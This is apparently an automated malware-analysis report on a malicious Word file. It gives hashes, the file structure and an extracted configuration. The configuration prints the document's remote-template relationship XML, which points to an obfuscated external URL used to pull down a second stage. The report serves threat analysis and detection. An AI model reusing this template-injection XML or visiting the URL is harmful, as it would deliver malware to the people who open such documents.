Malicious
Malicious

b1500a2fea112193955b58e89ba2c688

MS Word Document
|
MD5: b1500a2fea112193955b58e89ba2c688
|
Size: 751.16 KB
|
application/msword

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
b1500a2fea112193955b58e89ba2c688
Sha1
e576283c0140d4e5fa33d732b212a8034a43d11f
Sha256
978f952fc500407cdb2269be7e40be46845c5461dc787b29258f4e42792b4afe
Sha384
4a33bb3cdb0a7f5f7af0fa33a0bf44beeddd2a897c18f23a307fd4fda1c4408f1b01afdc3e7df4f9df6c7dd5cd210d5d
Sha512
ea6787aa54e10d052abfe2461eb9453e84e17d0e71188a5d22fc5a6ea392c1e1ccb0c4a9cab337b40bd9dee378cef95871b2b3a3273a3f63edef3c13acc4d057
SSDeep
12288:oxOB0lx3gd7rnoXPG0EmB1MLYOoPWLhkkZQHy3bJYs8DVZFn3vfZFOhWu:oA0lx3e7rnoXO0T1ML8UhpFrJHmZFn3o
TLSH
77F42344E421F40DEF464FAF1F120F06FE6991E67C3E59A5623903B086B0B2E9F16A16
File Structure
b1500a2fea112193955b58e89ba2c688
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
footer2.xml.rels
settings.xml.rels
Malicious
document.xml
footnotes.xml
footer3.xml
footer2.xml
header3.xml
endnotes.xml
media
image2.jpeg
image2.jpeg-preview.png
image1.emf
embeddings
oleObject1.bin
Root Entry
Ole
CompObj
ObjInfo
CONTENTS
Text (Preview)
Page #1
#Stream {6}
#Stream {12}
#Stream {14}
#Stream {13}
#Stream {3}
Structure
theme
theme1.xml
settings.xml
styles.xml
fontTable.xml
webSettings.xml
docProps
core.xml
app.xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://----------------------------------------09076565432147587698687676544232322232554453@go.arcanite.ch/wnHQVF?&-------------------------------------------88245456756798708875632321354666878786664067
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://----------------------------------------09076565432147587698687676544232322232554453@go.arcanite.ch/wnHQVF?&amp;-------------------------------------------88245456756798708875632321354666878786664067" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Informations
Name
 Value
CONTENTS

1.4
CONTENTS

D:20250930114133+01'00'
CONTENTS

PDF Presentation Adobe Photoshop

CONTENTS

D:20250930114134+01'00'
CONTENTS

Adobe Photoshop for Windows -- Image Conversion Plug-in
CONTENTS

D:20250930114133+01'00'
CONTENTS

PDF Presentation Adobe Photoshop

CONTENTS

D:20250930114134+01'00'
CONTENTS

Adobe Photoshop for Windows -- Image Conversion Plug-in
Artefacts
Name
 Value
Remote Template - Highly Suspicious

https://----------------------------------------09076565432147587698687676544232322232554453@go.arcanite.ch/wnHQVF?&-------------------------------------------88245456756798708875632321354666878786664067
b1500a2fea112193955b58e89ba2c688 (751.16 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙